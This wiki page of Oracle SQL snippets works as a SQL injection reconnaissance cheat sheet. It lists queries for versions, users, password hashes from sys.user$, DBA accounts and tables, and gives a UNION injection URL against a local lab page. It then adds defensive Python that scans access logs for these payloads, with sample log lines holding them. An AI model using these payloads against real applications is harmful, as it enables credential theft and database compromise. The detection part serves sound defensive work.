1.1 Practical PL/SQL examples

From UnixWiki

Version

 SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
 SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
 SELECT version FROM v$instance;

Current User

 SELECT user FROM dual;

List Users

 SELECT username FROM all_users ORDER BY username;
 SELECT name FROM sys.user$; -- priv

List Password Hashes

 SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g. astatus tells you if the account is locked
 SELECT name, spare4 FROM sys.user$; -- priv, 11g

List DBA Accounts

 SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles

List Databases

 SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
 -- Also query TNS listener for other databases. See tnscmd (services | status).

List Columns

 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
 SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';

List Tables

 SELECT table_name FROM all_tables;
 SELECT owner, table_name FROM all_tables;

String Concatenation

 SELECT 'A' || 'B' FROM dual; -- returns AB

Location of DB files

 SELECT name FROM V$DATAFILE;

Default/System Databases

 SYSTEM
 SYSAUX

Integration example listing the users

 http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL
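Requests like the one above leave a recognizable trace in web server access logs. The following Python code is an added example, not part of the original wiki page: it decodes query parameters from access-log lines and flags the Oracle constructs listed on this page. The log lines, signature names and regexes are constructed for illustration and are assumptions to tune before use.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Oracle objects and constructs used by the queries on this page.
# Signature names and patterns are this example's assumptions.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "from_dual": re.compile(r"\bfrom\s+dual\b", re.I),
    "version_views": re.compile(r"\bv\$(version|instance|datafile)\b", re.I),
    "user_hashes": re.compile(r"\bsys\.user\$", re.I),
    "dictionary_views": re.compile(
        r"\b(all_users|all_tables|all_tab_columns|dba_sys_privs)\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Undo repeated URL-encoding (e.g. %2520) so signatures see plain text."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return sorted (parameter, signature) hits for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []  # not a request line we understand
    hits = set()
    query = urlsplit(match.group(1)).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # Inline SQL comments are often used in place of whitespace.
        text = re.sub(r"/\*.*?\*/", " ", decode_fully(raw))
        for label, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.add((name, label))
    return sorted(hits)

# Constructed sample lines; the second carries the request shown on this page.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /sqlinjection/ora.php?id=101 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL HTTP/1.1" 200 530',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /sqlinjection/ora.php?id=1%2520union/**/select%2520banner%2520from%2520v$version HTTP/1.1" 200 600',
]

if __name__ == "__main__":
    for number, entry in enumerate(SAMPLE_LOG, start=1):
        print(number, scan_line(entry))
```

A hit on `from_dual` alone is weak evidence; combined with `union_select` or a dictionary view in a parameter that should be numeric, it is worth investigating.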